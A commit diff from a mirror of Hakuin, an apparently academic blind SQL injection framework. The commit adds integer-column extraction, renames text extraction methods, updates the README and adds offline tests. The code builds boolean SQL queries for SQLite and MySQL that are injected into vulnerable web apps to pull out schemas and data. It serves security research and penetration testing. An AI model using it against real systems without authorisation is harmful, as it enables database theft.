1
0
mirror of https://github.com/pruzko/hakuin synced 2024-09-08 03:30:41 +02:00

integer columns extraction, readme update, logo background

This commit is contained in:
Jakub Pruzinec 2023-10-29 17:05:38 +08:00
parent 30c08a8a44
commit dc0bc22682
13 changed files with 169 additions and 51 deletions

View File

@ -2,13 +2,14 @@
<img width="150" src="https://raw.githubusercontent.com/pruzko/hakuin/main/logo.png">
</p>
Hakuin is a Blind SQL Injection (BSQLI) inference optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract textual data in databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for DB content.
Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for textual DB content.
Hakuin been presented at academic and industrial conferences:
- [IEEE Workshop on Offsensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023
Hakuin has been presented at esteemed academic and industrial conferences:
- [BlackHat MEA, Riyadh](https://blackhatmea.com/session/hakuin-injecting-brain-blind-sql-injection), 2023
- [Hack in the Box, Phuket](https://conference.hitb.org/hitbsecconf2023hkt/session/hakuin-injecting-brains-into-blind-sql-injection/), 2023
- [IEEE S&P Workshop on Offsensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023
Also, make sure to read our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) or see the [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf).
More information can be found in our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) and [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf).
## Installation
@ -48,9 +49,9 @@ class ContentRequester(Requester):
return 'found' in r.content.decode()
```
To start infering data, use the `Extractor` class. It requires a `DBMS` object to contruct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`.
To start extracting data, use the `Extractor` class. It requires a `DBMS` object to contruct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`.
##### Example 1 - Inferring SQLite DBs
##### Example 1 - Extracting SQLite DBs
```python
from hakuin.dbms import SQLite
from hakuin import Extractor, Requester
@ -58,43 +59,43 @@ from hakuin import Extractor, Requester
class StatusRequester(Requester):
...
exf = Extractor(requester=StatusRequester(), dbms=SQLite())
ext = Extractor(requester=StatusRequester(), dbms=SQLite())
```
##### Example 2 - Inferring MySQL DBs
##### Example 2 - Extracting MySQL DBs
```python
from hakuin.dbms import MySQL
...
exf = Extractor(requester=StatusRequester(), dbms=MySQL())
ext = Extractor(requester=StatusRequester(), dbms=MySQL())
```
Now that eveything is set, you can start inferring DB schemas.
Now that eveything is set, you can start extracting DB schemas.
##### Example 1 - Inferring DB Schemas
##### Example 1 - Extracting DB Schemas
```python
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained models
schema = exf.extract_schema(strategy='model')
schema = ext.extract_schema(strategy='model')
```
##### Example 2 - Inferring DB Schemas with Metadata
##### Example 2 - Extracting DB Schemas with Metadata
```python
# metadata:
# True: Detect column settings (data type, nullable, primary key)
# False: Pass
schema = exf.extract_schema(strategy='model', metadata=True)
schema = ext.extract_schema(strategy='model', metadata=True)
```
##### Example 3 - Inferring only Table/Column Names
##### Example 3 - Extracting only Table/Column Names
```python
tables = exf.extract_table_names(strategy='model')
columns = exf.extract_column_names(table='users', strategy='model')
tables = ext.extract_table_names(strategy='model')
columns = ext.extract_column_names(table='users', strategy='model')
```
Once you know the schema, you can extract the actual content.
##### Example 1 - Inferring Textual Columns
##### Example 1 - Extracting Textual Columns
```python
# strategy:
# 'binary': Use binary search
@ -102,7 +103,12 @@ Once you know the schema, you can extract the actual content.
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = exfiltrate_text_data(table='users', column='address', strategy='dynamic'):
res = ext.extract_column_text(table='users', column='address', strategy='dynamic'):
```
##### Example 2 - Extracting Integer Columns
```python
res = ext.extract_column_int(table='users', column='id'):
```
More examples can be found in the `tests` directory.
@ -110,7 +116,7 @@ More examples can be found in the `tests` directory.
## For Researchers
This repository is maintained to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
#### Cite Hakuin

View File

@ -25,7 +25,7 @@ class Extractor:
models with Huffman trees
Returns:
list: List of extracted table names
list: list of extracted table names
'''
allowed = ['binary', 'model']
assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
@ -35,8 +35,10 @@ class Extractor:
n_rows = search_alg.IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.dbms.TablesQueries.rows_count,
lower=0,
upper=8,
find_range=True,
find_lower=False,
find_upper=True,
).run(ctx)
if strategy == 'binary':
@ -61,7 +63,7 @@ class Extractor:
models with Huffman trees
Returns:
list: List of extracted column names
list: list of extracted column names
'''
allowed = ['binary', 'model']
assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
@ -71,8 +73,10 @@ class Extractor:
n_rows = search_alg.IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.dbms.ColumnsQueries.rows_count,
lower=0,
upper=8,
find_range=True,
find_lower=False,
find_upper=True,
).run(ctx)
if strategy == 'binary':
@ -137,7 +141,7 @@ class Extractor:
return schema
def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
def extract_column_text(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
'''Extracts text column.
Params:
@ -152,7 +156,7 @@ class Extractor:
n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set
Returns:
list: List of strings in the column
list: list of strings in the column
'''
allowed = ['binary', 'unigram', 'fivegram', 'dynamic']
assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
@ -161,8 +165,10 @@ class Extractor:
n_rows = search_alg.IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.dbms.RowsQueries.rows_count,
lower=0,
upper=n_rows_guess,
find_range=True,
find_lower=False,
find_upper=True,
).run(ctx)
if strategy == 'binary':
@ -185,3 +191,30 @@ class Extractor:
queries=self.dbms.RowsQueries,
charset=charset,
).run(ctx, n_rows)
def extract_column_int(self, table, column, n_rows_guess=128):
'''Extracts text column.
Params:
table (str): table name
column (str): column name
n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set
Returns:
list: list of integers in the column
'''
ctx = search_alg.Context(table, column, None, None)
n_rows = search_alg.IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.dbms.RowsQueries.rows_count,
lower=0,
upper=n_rows_guess,
find_lower=False,
find_upper=True,
).run(ctx)
return collect.IntCollector(
requester=self.requester,
queries=self.dbms.RowsQueries,
).run(ctx, n_rows)

View File

@ -60,6 +60,22 @@ class Collector(metaclass=ABCMeta):
raise NotImplementedError()
class IntCollector(Collector):
'''Collector for integer columns'''
def __init__(self, requester, queries):
super().__init__(requester, queries)
def collect_row(self, ctx):
return IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.queries.int,
lower=0,
upper=128,
find_lower=True,
find_upper=True,
).run(ctx)
class TextCollector(Collector):
'''Collector for text columns.'''
@ -218,7 +234,8 @@ class BinaryTextCollector(TextCollector):
query_cb=self.queries.char_unicode,
lower=ASCII_MAX + 1,
upper=UNICODE_MAX + 1,
find_range=False,
find_lower=False,
find_upper=False,
correct=correct_ord,
)
res = search_alg.run(ctx)

View File

@ -293,6 +293,16 @@ class MySQLRowsQueries(UniformQueries):
return self.normalize(query)
def int(self, ctx, n):
query = f'''
SELECT {MySQL.escape(ctx.column)} < {n}
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
class MySQL(DBMS):
DATA_TYPES = [

View File

@ -278,6 +278,14 @@ class SQLiteRowsQueries(UniformQueries):
return self.normalize(query)
def int(self, ctx, n):
query = f'''
SELECT {SQLite.escape(ctx.column)} < {n}
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)

View File

@ -44,7 +44,7 @@ class SearchAlgorithm(metaclass=ABCMeta):
class IntExponentialBinarySearch(SearchAlgorithm):
'''Exponential and binary search for integers.'''
def __init__(self, requester, query_cb, lower=0, upper=16, find_range=True, correct=None):
def __init__(self, requester, query_cb, lower=0, upper=16, find_lower=False, find_upper=True, correct=None):
'''Constructor.
Params:
@ -52,13 +52,15 @@ class IntExponentialBinarySearch(SearchAlgorithm):
query_cb (function): query construction function
lower (int): lower bound of search range
upper (int): upper bound of search range
find_range (bool): exponentially expands range until the correct value is within
find_lower (bool): exponentially expands the lower bound until the correct value is within
find_upper (bool): exponentially expands the upper bound until the correct value is within
correct (int|None): correct value. If provided, the search is emulated
'''
super().__init__(requester, query_cb)
self.lower = lower
self.upper = upper
self.find_range = find_range
self.find_lower = find_lower
self.find_upper = find_upper
self.correct = correct
self.n_queries = 0
@ -74,29 +76,42 @@ class IntExponentialBinarySearch(SearchAlgorithm):
'''
self.n_queries = 0
if self.find_range:
lower, upper = self._find_range(ctx, lower=self.lower, upper=self.upper)
else:
lower, upper = self.lower, self.upper
if self.find_lower:
self._find_lower(ctx, self.upper - self.lower)
if self.find_upper:
self._find_upper(ctx, self.upper - self.lower)
return self._search(ctx, lower, upper)
return self._search(ctx, self.lower, self.upper)
def _find_range(self, ctx, lower, upper):
'''Exponentially expands the search range until the correct value is within.
def _find_lower(self, ctx, step):
'''Exponentially expands the lower bound until the correct value is within.
Params:
ctx (Context): extraction context
lower (int): lower bound
upper (int): upper bound
Returns:
int: correct upper bound
step (int): initial step
'''
if self._query(ctx, upper):
return lower, upper
if not self._query(ctx, self.lower):
return
return self._find_range(ctx, upper, upper * 2)
self.upper = self.lower
self.lower -= step
self._find_lower(ctx, step * 2)
def _find_upper(self, ctx, step):
'''Exponentially expands the upper bound until the correct value is within.
Params:
ctx (Context): extraction context
step (int): initial step
'''
if self._query(ctx, self.upper):
return
self.lower = self.upper
self.upper += step
self._find_upper(ctx, step * 2)
def _search(self, ctx, lower, upper):

BIN
logo.png

Binary file not shown.

Before

Width:  |  Height:  |  Size: 12 KiB

After

Width:  |  Height:  |  Size: 24 KiB

BIN
tests/dbs/data_types.sqlite Normal file

Binary file not shown.

28
tests/test_data_types.py Normal file
View File

@ -0,0 +1,28 @@
import json
import logging
import hakuin
from hakuin import Extractor
from hakuin.dbms import SQLite
from OfflineRequester import OfflineRequester
logging.basicConfig(level=logging.INFO)
def main():
requester = OfflineRequester(db='data_types', verbose=True)
ext = Extractor(requester=requester, dbms=SQLite())
# res = ext.extract_schema(strategy='binary')
# print(res)
res = ext.extract_column_int('data_types', 'integer')
if __name__ == '__main__':
main()

View File

@ -25,7 +25,7 @@ def main():
ext = Extractor(requester=requester, dbms=SQLite())
if len(sys.argv) == 3:
res = ext.extract_column(sys.argv[1], sys.argv[2])
res = ext.extract_column_text(sys.argv[1], sys.argv[2])
print('Total requests:', requester.n_queries)
print('Average RPC:', requester.n_queries / len(''.join(res)))
else:
@ -43,7 +43,7 @@ def main():
# measure rpc
for table, columns in rpc.items():
for column in columns:
res = ext.extract_column(table, column)
res = ext.extract_column_text(table, column)
res_len = len(''.join(res))
col_rpc = requester.n_queries / len(''.join(res))
rpc[table][column] = (requester.n_queries, col_rpc)

View File

@ -13,7 +13,7 @@ logging.basicConfig(level=logging.INFO)
def main():
requester = OfflineRequester(db='large_schema')
requester = OfflineRequester(db='large_schema', verbose=False)
ext = Extractor(requester=requester, dbms=SQLite())
res = ext.extract_schema()

View File

@ -47,7 +47,8 @@ def main():
res = ext.extract_schema(strategy='model', metadata=True)
print(json.dumps(res, indent=4))
else:
res = ext.extract_column(table, column)
res = ext.extract_column_text(table, column)
# res = ext.extract_column_int(table, column)
print(json.dumps(res, indent=4))

View File

@ -20,7 +20,7 @@ def main():
res = ext.extract_schema(strategy='binary')
print(res)
res = ext.extract_column('Ħ€ȽȽ©', 'ŴǑȒȽƉ')
res = ext.extract_column_text('Ħ€ȽȽ©', 'ŴǑȒȽƉ')